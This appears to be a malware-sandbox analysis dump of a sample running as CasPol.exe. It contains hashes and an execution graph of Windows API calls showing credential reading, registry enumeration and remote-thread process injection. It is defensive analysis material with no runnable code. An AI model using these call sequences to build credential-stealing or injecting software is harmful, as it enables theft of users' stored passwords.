                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                    • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                                                    • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040799A
                                                                                                                                                                                                                      • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                      • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                                      • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                    • free.MSVCRT ref: 004079BD
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                                                                                    • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                                                    • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:13.8%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                                                                                                    Signature Coverage:2.7%
                                                                                                                                                                                                                    Total number of Nodes:1726
                                                                                                                                                                                                                    Total number of Limit Nodes:46
                                                                                                                                                                                                                    execution_graph 6624 413d44 6627 413d1e 6624->6627 6626 413d4d 6628 413d27 _onexit 6627->6628 6629 413d2d __dllonexit 6627->6629 6628->6629 6629->6626 8686 4140c4 8689 413d44 8686->8689 8690 413d1e 2 API calls 8689->8690 8691 413d4d 8690->8691 8126 405b5a 8127 405b72 8126->8127 8128 405c39 8126->8128 8130 405b82 memset 8127->8130 8134 405be7 8127->8134 8158 402c27 8128->8158 8140 40876f 8130->8140 8134->8128 8138 405c28 _mbscpy 8134->8138 8135 40876f 12 API calls 8136 405bb5 sprintf 8135->8136 8137 405bdd 8136->8137 8153 412396 SHGetMalloc 8137->8153 8138->8128 8141 408778 8140->8141 8142 40877d 8140->8142 8162 4086ed 8141->8162 8144 405bac 8142->8144 8145 4087e0 _mbscpy 8142->8145 8146 4087ad 8142->8146 8144->8135 8165 408bf9 _itoa 8145->8165 8147 408838 LoadStringA 8146->8147 8149 408842 8147->8149 8149->8144 8152 408863 memcpy 8149->8152 8151 408802 strlen 8151->8146 8151->8149 8152->8144 8154 4123b0 SHBrowseForFolder 8153->8154 8156 412406 8153->8156 8155 4123e4 SHGetPathFromIDList 8154->8155 8154->8156 8155->8156 8157 4123f6 _mbscpy 8155->8157 8156->8134 8157->8156 8159 402c5b 8158->8159 8160 402c34 8158->8160 8160->8159 8161 402c4b EndDialog 8160->8161 8161->8159 8163 4086f6 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 8162->8163 8164 40876e 8162->8164 8163->8164 8164->8142 8168 408c31 8165->8168 8167 4087fb 8167->8146 8167->8151 8169 414060 8168->8169 8170 408c3e memset GetPrivateProfileStringA 8169->8170 8171 408c87 _mbscpy 8170->8171 8172 408c9d 8170->8172 8171->8167 8172->8167 6011 411e70 6014 411d37 6011->6014 6013 411e90 6015 411d43 6014->6015 6016 411d55 GetPrivateProfileIntA 6014->6016 6019 411c43 memset _itoa WritePrivateProfileStringA 6015->6019 6016->6013 6018 411d50 6018->6013 6019->6018 6630 40f105 6631 40f117 6630->6631 6632 40f12a 6630->6632 6631->6632 6839 40e54d 6631->6839 6633 40f136 6632->6633 6673 40da79 6632->6673 6636 40f14c 6633->6636 6850 40dfd9 6633->6850 6637 40f167 6636->6637 6862 40e0a1 6636->6862 6639 40f173 6637->6639 6707 40e725 6637->6707 6642 40f191 6639->6642 6720 40260a 6639->6720 6644 40f1af 6642->6644 6731 402834 6642->6731 6646 40f1bb 6644->6646 6875 40eb3d 6644->6875 6648 40f1c9 6646->6648 6892 40ea56 6646->6892 6650 40f1e7 6648->6650 6651 40f1cf 6648->6651 6653 40f1f2 6650->6653 6743 40d9b9 memset memset 6650->6743 6909 40efc1 6651->6909 6656 40f1fe 6653->6656 6750 40d935 memset GetWindowsDirectoryA GetVolumeInformationA 6653->6750 6657 40f232 6656->6657 6755 407f7e 6656->6755 6661 40f250 6657->6661 6785 410b95 memset memset 6657->6785 6658 40efc1 34 API calls 6658->6650 6664 40f26f 6661->6664 6796 410f07 6661->6796 6667 40f27f 6664->6667 6811 40f09c memset 6664->6811 6821 40e675 memset 6667->6821 6923 40fd01 memset memset 6673->6923 6675 40dab7 RegOpenKeyExA 6678 40daa9 6675->6678 6676 40daed RegOpenKeyExA 6676->6678 6678->6675 6678->6676 6680 40db7b RegOpenKeyExA 6678->6680 6683 406958 strlen memcpy 6678->6683 6924 40ff88 6678->6924 6979 40fe5d RegQueryValueExA 6678->6979 6681 40dbaf 6680->6681 6682 40db95 6680->6682 6685 40dc11 RegOpenKeyExA 6681->6685 6686 406958 2 API calls 6681->6686 6992 40fd2e RegQueryValueExA 6682->6992 6683->6678 6687 40dc45 6685->6687 6688 40dc2b 6685->6688 6689 40dbe0 6686->6689 6692 406958 2 API calls 6687->6692 6701 40dc89 6687->6701 6690 40fd2e 9 API calls 6688->6690 6691 406958 2 API calls 6689->6691 6690->6687 6693 40dbf3 6691->6693 6695 40dc76 6692->6695 6693->6685 6697 406958 2 API calls 6695->6697 6697->6701 6700 40dcd8 7005 404ce0 6700->7005 6939 4103f1 6701->6939 6705 404ce0 FreeLibrary 6706 40dce8 6705->6706 6706->6633 7333 411d68 RegOpenKeyExA 6707->7333 6709 40e744 6710 40e8f3 6709->6710 6711 40e74f memset memset memset memset 6709->6711 6710->6639 7334 411dee RegEnumKeyExA 6711->7334 6713 40e7c5 sprintf 6715 411dae 3 API calls 6713->6715 6714 40e8ea RegCloseKey 6714->6710 6718 40e7bd 6715->6718 6716 40e803 strlen 6716->6718 6718->6713 6718->6714 6718->6716 6719 40e85b _mbscpy _mbscpy 6718->6719 7335 411dee RegEnumKeyExA 6718->7335 6719->6718 6721 406b2a GetVersionExA 6720->6721 6722 40261a 6721->6722 6723 402622 RegOpenKeyExW 6722->6723 6724 40272a 6722->6724 6723->6724 6725 402646 memset memset 6723->6725 6724->6642 6726 40270a RegEnumValueW 6725->6726 6727 402721 RegCloseKey 6726->6727 6728 4026a8 wcscpy 6726->6728 6727->6724 7336 40244d memset WideCharToMultiByte 6728->7336 7343 411d68 RegOpenKeyExA 6731->7343 6733 402850 6734 4028e3 6733->6734 6735 40285b memset 6733->6735 6734->6644 7344 411dee RegEnumKeyExA 6735->7344 6737 4028dc RegCloseKey 6737->6734 6739 402888 6739->6737 7345 411d68 RegOpenKeyExA 6739->7345 7346 402730 6739->7346 7353 411dee RegEnumKeyExA 6739->7353 7354 413735 memset 6743->7354 6746 406958 2 API calls 6747 40da40 6746->6747 6748 406958 2 API calls 6747->6748 6749 40da53 6748->6749 6749->6653 7439 40d794 6750->7439 6753 40d9b3 6753->6656 6754 40d794 24 API calls 6754->6753 6756 407f8b 6755->6756 7468 407c79 11 API calls 6756->7468 6760 407fa8 6761 407fb3 memset 6760->6761 6762 408077 6760->6762 7471 411dee RegEnumKeyExA 6761->7471 6773 407bc6 6762->6773 6764 408072 RegCloseKey 6764->6762 6766 407fe4 6766->6764 6767 408006 memset 6766->6767 7472 411d68 RegOpenKeyExA 6766->7472 7486 411dee RegEnumKeyExA 6766->7486 6768 411d82 RegQueryValueExA 6767->6768 6770 408039 6768->6770 7473 407e33 strlen 6770->7473 7487 411d68 RegOpenKeyExA 6773->7487 6775 407be4 6776 407c73 6775->6776 6777 407bef memset 6775->6777 6776->6657 7488 411dee RegEnumKeyExA 6777->7488 6779 407c6e RegCloseKey 6779->6776 6781 407c1d 6781->6779 7489 411d68 RegOpenKeyExA 6781->7489 7490 407a93 memset RegQueryValueExA 6781->7490 7503 411dee RegEnumKeyExA 6781->7503 6786 41223f 10 API calls 6785->6786 6787 410be4 strlen strlen 6786->6787 6788 410c07 6787->6788 6790 410c1a 6787->6790 6789 406b4b 4 API calls 6788->6789 6789->6790 7504 4069d3 GetFileAttributesA 6790->7504 6792 410c31 6793 410c45 6792->6793 6794 410c36 6792->6794 6793->6661 7505 410ac5 6794->7505 7557 411d68 RegOpenKeyExA 6796->7557 6798 410f25 6799 410f30 memset 6798->6799 6800 411025 6798->6800 7558 411dee RegEnumKeyExA 6799->7558 6800->6664 6802 41101c RegCloseKey 6802->6800 6804 410f7f memset 6806 411d82 RegQueryValueExA 6804->6806 6807 410f5d 6806->6807 6807->6802 6807->6804 6808 411d82 RegQueryValueExA 6807->6808 6810 410ff3 RegCloseKey 6807->6810 7559 411d68 RegOpenKeyExA 6807->7559 7560 410e85 strlen 6807->7560 7562 411dee RegEnumKeyExA 6807->7562 6808->6807 6810->6807 6812 41223f 10 API calls 6811->6812 6813 40f0db 6812->6813 6814 406efe 3 API calls 6813->6814 6815 40f0e5 6814->6815 7563 4069d3 GetFileAttributesA 6815->7563 6817 40f0ee 6818 40f0f3 6817->6818 6819 40f0ff 6817->6819 7564 405ae8 6818->7564 6819->6667 7590 40f9a0 6821->7590 6824 40e6bc 7603 4064fb 6824->7603 6829 40e5d3 6830 40e5e9 6829->6830 6831 407364 7 API calls 6830->6831 6832 40e644 6831->6832 7772 4085b9 6832->7772 6836 40e661 7790 40819f 6836->7790 7871 40e4b6 memset strlen strlen 6839->7871 6841 40e5cb 6841->6632 6843 40783b 9 API calls 6848 40e592 6843->6848 6844 407898 9 API calls 6844->6848 6845 40e5c0 6847 407930 FindClose 6845->6847 6846 407800 2 API calls 6846->6848 6847->6841 6848->6844 6848->6845 6848->6846 6849 40e54d 33 API calls 6848->6849 6849->6848 6851 40e012 6850->6851 6853 40e05d 6851->6853 6854 40e031 6851->6854 7896 40dd65 6851->7896 6853->6636 6855 40783b 9 API calls 6854->6855 6860 40e05b 6855->6860 6856 407898 9 API calls 6856->6860 6857 40e08e 6859 407930 FindClose 6857->6859 6858 407800 2 API calls 6858->6860 6859->6853 6860->6856 6860->6857 6860->6858 6861 40dfd9 30 API calls 6860->6861 6861->6860 6863 414060 6862->6863 6864 40e0ae memset strlen strlen 6863->6864 6865 40e0fe GetPrivateProfileIntA 6864->6865 6866 40e0eb 6864->6866 6869 40e28c 6865->6869 6874 40e12e 6865->6874 6868 406b4b 4 API calls 6866->6868 6868->6865 6869->6637 6870 40e133 8 API calls 6870->6874 6871 4029d9 strlen 6871->6874 6872 40dcf2 strtoul 6872->6874 6873 406958 strlen memcpy 6873->6874 6874->6869 6874->6870 6874->6871 6874->6872 6874->6873 6876 40ec1a 6875->6876 6877 40eb5c memset strlen strlen 6875->6877 6876->6646 6878 40eb93 6877->6878 6879 40eba9 6877->6879 6880 406b4b 4 API calls 6878->6880 6879->6876 7915 4069d3 GetFileAttributesA 6879->7915 6880->6879 6882 40ebc8 6882->6876 7916 412d65 6882->7916 6886 40ebfd 6887 40ec0f 6886->6887 7937 412f4b 6886->7937 7957 412e4d 6887->7957 6893 40eb33 6892->6893 6894 40ea75 memset strlen strlen 6892->6894 6893->6648 6895 40eac2 6894->6895 6896 40eaac 6894->6896 6895->6893 8008 4069d3 GetFileAttributesA 6895->8008 6897 406b4b 4 API calls 6896->6897 6897->6895 6899 40eae1 6899->6893 6900 412d65 6 API calls 6899->6900 6901 40eaf1 6900->6901 6902 412f02 6 API calls 6901->6902 6903 40eb16 6902->6903 6904 40eb28 6903->6904 6905 412f4b 12 API calls 6903->6905 6906 412e4d 9 API calls 6904->6906 6907 40eb21 6905->6907 6906->6893 6908 40d1a5 22 API calls 6907->6908 6908->6904 6910 40f093 6909->6910 6911 40efd6 6909->6911 6910->6658 6912 40783b 9 API calls 6911->6912 6913 40effd 6912->6913 6914 407898 9 API calls 6913->6914 6919 40f008 6914->6919 6915 40f088 6916 407930 FindClose 6915->6916 6916->6910 6917 407898 9 API calls 6917->6919 6919->6915 6919->6917 6921 40f076 CloseHandle 6919->6921 6922 40f05d CloseHandle 6919->6922 8009 4067ba CreateFileA 6919->8009 8010 40f8a8 6919->8010 6921->6919 6922->6919 6923->6678 7008 404109 6924->7008 6931 40ffc3 CredReadW 6934 410085 6931->6934 6935 40ffda 6931->6935 6932 404ce0 FreeLibrary 6933 41009c 6932->6933 6933->6678 7024 404170 6934->7024 6935->6934 6936 41003a WideCharToMultiByte 6935->6936 6937 410061 WideCharToMultiByte 6936->6937 6938 41007a LocalFree 6936->6938 6937->6938 6938->6934 6940 414060 6939->6940 6941 4103fe RegOpenKeyExA 6940->6941 6942 40dcc1 6941->6942 6943 410428 RegOpenKeyExA 6941->6943 6953 410205 6942->6953 6944 410440 RegQueryValueExA 6943->6944 6945 41050f RegCloseKey 6943->6945 6946 410506 RegCloseKey 6944->6946 6947 41046d 6944->6947 6945->6942 6946->6945 6948 404c9d 3 API calls 6947->6948 6949 41047a 6948->6949 6949->6946 6950 4104fd LocalFree 6949->6950 6951 4104bf memcpy memcpy 6949->6951 6950->6946 7027 4100a4 6951->7027 7043 406b3b 6953->7043 6956 404109 5 API calls 6957 41023a 6956->6957 6958 41036e 6957->6958 6960 41024d CredEnumerateW 6957->6960 6962 41025c 6957->6962 6959 404170 FreeLibrary 6958->6959 6961 40dcca 6959->6961 6960->6962 6961->6700 6968 410383 6961->6968 6962->6958 6963 410296 memset WideCharToMultiByte 6962->6963 7046 40fd01 memset memset 6962->7046 6963->6962 6964 4102d1 _strnicmp 6963->6964 6964->6962 6966 4102f6 WideCharToMultiByte 6966->6962 6967 410316 WideCharToMultiByte 6966->6967 6967->6962 6969 406b06 GetVersionExA 6968->6969 6971 41038e 6969->6971 6970 4103ed 6970->6700 6971->6970 7047 4028e7 6971->7047 6974 4103ca 7056 404380 memset 6974->7056 6975 4103ba _mbscpy 6975->6974 6978 404380 149 API calls 6978->6970 6980 40ff74 RegCloseKey 6979->6980 6981 40fe9a 6979->6981 6980->6678 6981->6980 6982 40ff18 6981->6982 6983 404c9d 3 API calls 6981->6983 6984 40ff60 6982->6984 7331 4029d9 strlen 6982->7331 6989 40fec1 6983->6989 6984->6980 6985 40ff10 6987 404ce0 FreeLibrary 6985->6987 6987->6982 6988 40ff3e RegQueryValueExA 6988->6984 6989->6985 6990 40fef1 memcpy 6989->6990 6991 40ff07 LocalFree 6989->6991 6990->6991 6991->6985 6993 40fe48 RegCloseKey 6992->6993 6994 40fd6c 6992->6994 6993->6681 6994->6993 6995 404c9d 3 API calls 6994->6995 6999 40fd97 6995->6999 6996 40fdec 6997 404ce0 FreeLibrary 6996->6997 6998 40fdf4 6997->6998 6998->6993 7002 4029d9 strlen 6998->7002 6999->6996 7000 40fde3 LocalFree 6999->7000 7001 40fdc7 memcpy 6999->7001 7000->6996 7001->7000 7003 40fe17 RegQueryValueExA 7002->7003 7003->6993 7004 40fe35 7003->7004 7004->6993 7006 404cf4 7005->7006 7007 404cea FreeLibrary 7005->7007 7006->6705 7007->7006 7009 404170 FreeLibrary 7008->7009 7010 404111 LoadLibraryA 7009->7010 7011 404122 GetProcAddress GetProcAddress GetProcAddress 7010->7011 7012 40416b 7010->7012 7013 404153 7011->7013 7012->6934 7016 404c9d 7012->7016 7014 404170 FreeLibrary 7013->7014 7015 40415d 7013->7015 7014->7012 7015->7012 7017 404ce0 FreeLibrary 7016->7017 7018 404ca5 LoadLibraryA 7017->7018 7019 404cd0 7018->7019 7020 404cb6 GetProcAddress 7018->7020 7021 404cdb 7019->7021 7023 404ce0 FreeLibrary 7019->7023 7020->7019 7022 404cc9 7020->7022 7021->6931 7021->6934 7022->7019 7023->7021 7025 404180 7024->7025 7026 404176 FreeLibrary 7024->7026 7025->6932 7026->7025 7028 414060 7027->7028 7029 4100b1 RegOpenKeyExA 7028->7029 7030 4100d6 memset 7029->7030 7031 4101fe 7029->7031 7032 4101e4 RegEnumKeyA 7030->7032 7031->6950 7033 410103 RegOpenKeyExA 7032->7033 7034 4101f5 RegCloseKey 7032->7034 7035 410125 RegQueryValueExA 7033->7035 7037 41014e 7033->7037 7034->7031 7036 4101cd RegCloseKey 7035->7036 7035->7037 7036->7037 7037->7032 7037->7036 7039 406958 2 API calls 7037->7039 7042 40fd01 memset memset 7037->7042 7040 41019d WideCharToMultiByte 7039->7040 7041 4101c2 LocalFree 7040->7041 7041->7036 7042->7037 7044 406b06 GetVersionExA 7043->7044 7045 406b40 7044->7045 7045->6956 7046->6966 7065 4066e3 7047->7065 7050 402918 7052 4066e3 strncat 7050->7052 7051 40293a 7051->6974 7051->6975 7053 402922 GetProcAddress 7052->7053 7054 402933 FreeLibrary 7053->7054 7055 40292e 7053->7055 7054->7051 7055->7054 7057 41223f 10 API calls 7056->7057 7058 4043b7 7057->7058 7059 40680e 2 API calls 7058->7059 7064 4043da 7058->7064 7060 4043c2 7059->7060 7069 406efe strlen strlen 7060->7069 7064->6978 7066 406712 7065->7066 7067 4066f0 strncat 7066->7067 7068 402901 GetModuleHandleA 7066->7068 7067->7066 7068->7050 7068->7051 7070 4043cc 7069->7070 7071 406f1b _mbscat 7069->7071 7072 4042aa 7070->7072 7071->7070 7087 40783b 7072->7087 7076 40436c 7123 407930 7076->7123 7079 406b3b GetVersionExA 7082 4042ee 7079->7082 7081 404326 7081->7082 7105 404220 7081->7105 7082->7076 7082->7079 7082->7081 7083 40430c _strnicmp 7082->7083 7085 4042aa 138 API calls 7082->7085 7086 407898 9 API calls 7082->7086 7119 407800 7082->7119 7083->7081 7083->7082 7085->7082 7086->7082 7088 407930 FindClose 7087->7088 7089 407846 7088->7089 7090 406958 2 API calls 7089->7090 7091 40785a strlen strlen 7090->7091 7092 407883 7091->7092 7093 4042e3 7091->7093 7094 406b4b 4 API calls 7092->7094 7095 407898 7093->7095 7094->7093 7096 4078a3 FindFirstFileA 7095->7096 7097 4078c4 FindNextFileA 7095->7097 7098 4078df 7096->7098 7099 4078e6 strlen strlen 7097->7099 7100 4078da 7097->7100 7098->7099 7104 40791f 7098->7104 7102 407916 7099->7102 7099->7104 7101 407930 FindClose 7100->7101 7101->7098 7103 406b4b 4 API calls 7102->7103 7103->7104 7104->7082 7126 4067ba CreateFileA 7105->7126 7107 404233 7108 4042a0 7107->7108 7109 40423e GetFileSize 7107->7109 7108->7081 7110 404253 ??2@YAPAXI 7109->7110 7111 404297 CloseHandle 7109->7111 7127 406ed6 ReadFile 7110->7127 7111->7108 7114 404290 ??3@YAXPAX 7114->7111 7115 406b3b GetVersionExA 7116 404275 7115->7116 7129 4049e6 7116->7129 7120 40780a strcmp 7119->7120 7122 407832 7119->7122 7121 407821 strcmp 7120->7121 7120->7122 7121->7122 7122->7082 7124 404377 7123->7124 7125 407939 FindClose 7123->7125 7124->7064 7125->7124 7126->7107 7128 404269 7127->7128 7128->7114 7128->7115 7168 4043e4 memset 7129->7168 7132 40428d 7132->7114 7133 404a04 OpenProcess 7133->7132 7134 404a1c memset GetModuleHandleA 7133->7134 7183 411ba1 7134->7183 7137 404a61 7139 411ba1 6 API calls 7137->7139 7138 404a66 GetProcAddress 7138->7137 7140 404a77 7139->7140 7141 404a82 7140->7141 7142 404a87 GetProcAddress 7140->7142 7143 411ba1 6 API calls 7141->7143 7142->7141 7144 404a98 7143->7144 7145 404aa3 7144->7145 7146 404aa8 GetProcAddress 7144->7146 7147 411ba1 6 API calls 7145->7147 7146->7145 7148 404ab9 7147->7148 7149 404ac4 7148->7149 7150 404ac9 GetProcAddress 7148->7150 7151 404acb VirtualAllocEx VirtualAllocEx VirtualAllocEx VirtualAllocEx 7149->7151 7150->7151 7152 404c57 VirtualFreeEx VirtualFreeEx VirtualFreeEx VirtualFreeEx CloseHandle 7151->7152 7153 404b2c 7151->7153 7152->7132 7153->7152 7154 404b46 WriteProcessMemory 7153->7154 7187 40496d _mbscat _mbscpy _mbscpy 7154->7187 7156 404b65 WriteProcessMemory WriteProcessMemory 7188 411fc6 GetVersionExA 7156->7188 7161 404c11 ??2@YAPAXI ReadProcessMemory 7163 404c31 7161->7163 7164 404c42 ??3@YAXPAX 7161->7164 7162 404c49 7162->7152 7165 404c4e FreeLibrary 7162->7165 7210 404915 7163->7210 7164->7162 7165->7152 7169 404436 _mbscpy 7168->7169 7170 404429 GetSystemDirectoryA 7168->7170 7171 40680e 2 API calls 7169->7171 7170->7169 7172 404450 7171->7172 7173 4028e7 4 API calls 7172->7173 7174 404455 7173->7174 7175 406efe 3 API calls 7174->7175 7176 40448f 7175->7176 7218 411147 7176->7218 7181 4044cd 7181->7132 7181->7133 7182 4044ac memcpy 7182->7181 7184 411bb3 GetModuleHandleA GetProcAddress 7183->7184 7185 404a50 7183->7185 7184->7185 7186 411be4 GetModuleHandleA GetProcAddress strlen strlen 7184->7186 7185->7137 7185->7138 7186->7185 7187->7156 7189 41206a CreateRemoteThread 7188->7189 7190 411fec 7188->7190 7192 404bac 7189->7192 7308 411f43 7190->7308 7193 4044de 7192->7193 7194 410daa 2 API calls 7193->7194 7196 4044f8 7194->7196 7195 404565 7197 404574 ResumeThread WaitForSingleObject CloseHandle memset ReadProcessMemory 7195->7197 7198 40456b FreeLibrary 7195->7198 7196->7195 7199 410d8a LoadLibraryA 7196->7199 7197->7161 7197->7162 7198->7197 7200 404509 7199->7200 7201 40455a CloseHandle 7200->7201 7202 40450d GetProcAddress 7200->7202 7201->7195 7203 404522 7202->7203 7204 404559 7202->7204 7203->7204 7205 410d8a LoadLibraryA 7203->7205 7204->7201 7206 404537 7205->7206 7207 404550 CloseHandle 7206->7207 7208 40453b GetProcAddress 7206->7208 7207->7204 7208->7207 7209 404549 7208->7209 7209->7207 7211 406b3b GetVersionExA 7210->7211 7212 40491c 7211->7212 7213 404920 7212->7213 7214 404939 7212->7214 7216 404937 7213->7216 7312 404890 7213->7312 7214->7216 7217 404890 15 API calls 7214->7217 7216->7164 7217->7214 7240 406b2a 7218->7240 7221 411150 7243 4110af 7221->7243 7222 411157 7253 41102b 7222->7253 7225 404495 7226 411560 7225->7226 7227 41156d 7226->7227 7228 406b2a GetVersionExA 7227->7228 7229 411575 7228->7229 7231 41158b memset 7229->7231 7232 41161e 7229->7232 7230 4044a3 7230->7181 7230->7182 7234 4115bf 7231->7234 7232->7230 7235 411650 _mbscpy 7232->7235 7236 411696 CloseHandle 7232->7236 7234->7230 7261 4112d9 7234->7261 7271 411172 7234->7271 7287 41172b 7234->7287 7238 41172b 8 API calls 7235->7238 7236->7230 7238->7232 7241 406b06 GetVersionExA 7240->7241 7242 406b2f 7241->7242 7242->7221 7242->7222 7244 4110bc LoadLibraryA 7243->7244 7245 411145 7243->7245 7244->7245 7246 4110ce GetProcAddress 7244->7246 7245->7225 7247 41112a 7246->7247 7248 4110e6 GetProcAddress 7246->7248 7247->7245 7249 41113e FreeLibrary 7247->7249 7248->7247 7250 4110f7 GetProcAddress 7248->7250 7249->7245 7250->7247 7251 411108 GetProcAddress 7250->7251 7251->7247 7252 411119 GetProcAddress 7251->7252 7252->7247 7254 411034 GetModuleHandleA 7253->7254 7260 4110a2 7253->7260 7255 411046 GetProcAddress 7254->7255 7254->7260 7256 41105e GetProcAddress 7255->7256 7255->7260 7257 41106f GetProcAddress 7256->7257 7256->7260 7258 411080 GetProcAddress 7257->7258 7257->7260 7259 411091 GetProcAddress 7258->7259 7258->7260 7259->7260 7260->7225 7262 406b2a GetVersionExA 7261->7262 7263 4112ea 7262->7263 7264 41133e 7263->7264 7265 4112ee 7263->7265 7292 411255 7264->7292 7266 411347 7265->7266 7267 4112f6 OpenProcess 7265->7267 7266->7234 7267->7266 7270 41130b CloseHandle 7267->7270 7270->7266 7272 411184 strchr 7271->7272 7274 411181 _mbscpy 7271->7274 7272->7274 7275 4111a4 7272->7275 7276 411250 7274->7276 7277 407139 3 API calls 7275->7277 7276->7234 7278 4111b3 7277->7278 7279 4111ba memset 7278->7279 7280 4111fd 7278->7280 7297 406bc3 7279->7297 7282 411202 memset 7280->7282 7283 411247 _mbscpy 7280->7283 7285 406bc3 2 API calls 7282->7285 7283->7276 7284 4111e0 _mbscpy _mbscat 7284->7276 7286 411228 memcpy _mbscat 7285->7286 7286->7276 7300 4116a9 strchr 7287->7300 7290 411743 memcpy 7291 411764 7290->7291 7291->7234 7293 4112b7 7292->7293 7294 411268 7292->7294 7293->7266 7294->7293 7295 4112b0 CloseHandle 7294->7295 7296 4112bc _mbscpy CloseHandle 7294->7296 7295->7293 7296->7293 7298 406bd2 GetWindowsDirectoryA 7297->7298 7299 406be3 _mbscpy 7297->7299 7298->7299 7299->7284 7301 4116d2 strchr 7300->7301 7306 4116c0 7300->7306 7302 4116ec memset 7301->7302 7301->7306 7304 406a87 _mbscpy strrchr 7302->7304 7303 4116c4 _strcmpi 7305 4116cb 7303->7305 7307 411715 _strcmpi 7304->7307 7305->7290 7305->7291 7306->7303 7307->7305 7309 411f4e LoadLibraryA 7308->7309 7311 411fc1 7308->7311 7310 411f63 GetProcAddress 7309->7310 7309->7311 7310->7311 7311->7192 7313 406b3b GetVersionExA 7312->7313 7315 4048a2 7313->7315 7314 40490b 7314->7216 7315->7314 7317 404578 wcslen memset 7315->7317 7318 406b3b GetVersionExA 7317->7318 7324 4045c7 7318->7324 7319 404649 wcschr 7321 40465c wcsncmp 7319->7321 7319->7324 7320 406b3b GetVersionExA 7320->7324 7321->7324 7322 404c9d LoadLibraryA GetProcAddress FreeLibrary 7322->7324 7323 404824 memcpy 7323->7324 7324->7319 7324->7320 7324->7321 7324->7322 7324->7323 7325 404ce0 FreeLibrary 7324->7325 7326 40487f 7324->7326 7327 4046f1 memcpy wcschr 7324->7327 7328 4047d8 memcpy LocalFree 7324->7328 7325->7324 7326->7314 7329 404720 wcscpy 7327->7329 7330 404732 LocalFree 7327->7330 7328->7324 7329->7330 7330->7324 7332 4029f8 7331->7332 7332->6988 7333->6709 7334->6718 7335->6718 7337 4029d9 strlen 7336->7337 7338 4024a4 7337->7338 7339 4024b7 ??2@YAPAXI ??2@YAPAXI memcpy 7338->7339 7340 4024ac 7338->7340 7341 4025c8 7339->7341 7340->6726 7340->6727 7342 4025ea ??3@YAXPAX ??3@YAXPAX 7341->7342 7342->7340 7343->6733 7344->6739 7345->6739 7347 411d82 RegQueryValueExA 7346->7347 7348 40275e 7347->7348 7349 40282d RegCloseKey 7348->7349 7350 40276a strtoul 7348->7350 7349->6739 7350->7350 7351 402794 7350->7351 7352 4027ee _mbscpy _mbscpy 7351->7352 7352->7349 7353->6739 7365 411d68 RegOpenKeyExA 7354->7365 7356 413772 7357 40da13 7356->7357 7358 411d82 RegQueryValueExA 7356->7358 7357->6746 7357->6749 7359 41378b 7358->7359 7360 4137bc RegCloseKey 7359->7360 7361 411d82 RegQueryValueExA 7359->7361 7360->7357 7362 4137a6 7361->7362 7362->7360 7366 413a5a 7362->7366 7365->7356 7378 413646 strlen 7366->7378 7368 413a73 7369 413a92 7368->7369 7380 4137ce 7368->7380 7373 4137ba 7369->7373 7409 413b1d memset memset memset 7369->7409 7372 413aab 7372->7373 7374 413acb memset 7372->7374 7373->7360 7375 4137ce 21 